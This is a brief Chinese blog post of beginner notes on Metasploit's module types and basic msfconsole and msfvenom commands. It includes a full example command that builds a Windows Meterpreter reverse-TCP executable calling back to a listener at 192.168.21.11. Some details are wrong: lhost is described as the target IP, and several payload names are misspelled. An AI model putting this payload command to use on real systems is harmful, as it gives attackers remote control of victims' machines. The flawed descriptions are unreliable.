MSF-Metasploit

MSF共7个模块:

       exploits:漏洞利用模块,漏洞利用是攻击者利用服务器的漏洞进行攻击的一种行为,其中包含了 主流漏洞的攻击代码


  auxiliary:辅助模块,主要用来执行扫描,嗅探,指纹识别等,算是信息搜集的内容


  post:后渗透模块,在取得目标系统远程控制权后,可进行一系列获取敏感信息,跳板攻击等 后渗透攻击的动作


  Payload:攻击载荷模块,用来在目标系统上完成实际的攻击功能的代码


  Encoders:编码工具模块,用来进行免杀,防止被杀毒软件,防火墙,ids等检测

  
  Nops:绕过针对溢出攻击滑行字符串的拦截检测


  evasion:免杀模块,绕过windows系统自带的软件

 

命令用法:

  msfconsole:启动

  use exploits :显示该模块的所有

  use myssql:显示mysql的相关的攻击模块

  use 32:选择32号攻击模块 或接上模块名后的路径,如:use multi/manage/dbvis_add_db_admin

 

  show options:显示需要设置的参数,Required(是否必设) ,(current stting对设置),(Description描述),(name对应的选项)

  set name current setting >>>>>> set dbalias 127.0.0.1   ,localhost变为127.0.0.1

  exploit / run :开始执行攻击

 

MSFVenom

 

 

命令用法:

  msfvenom:启动

  msfvenom -l payloads:查看所有的payload

  msfvenom --list formats:查看支持的后缀名

  msfvenom -p 指定payload lhost(目标ip) lprot(目标端口) -f 文件后缀 > 位置和名字

  如:msfvenom -p windows/x64/meterpeter/revers_tcp lhost=192.168.21.11 lport=89 -f exe > /123.exe(根目录下)

 

posted @ 2021-08-21 16:44  PatrickStar88888888  阅读(100)  评论(0编辑  收藏  举报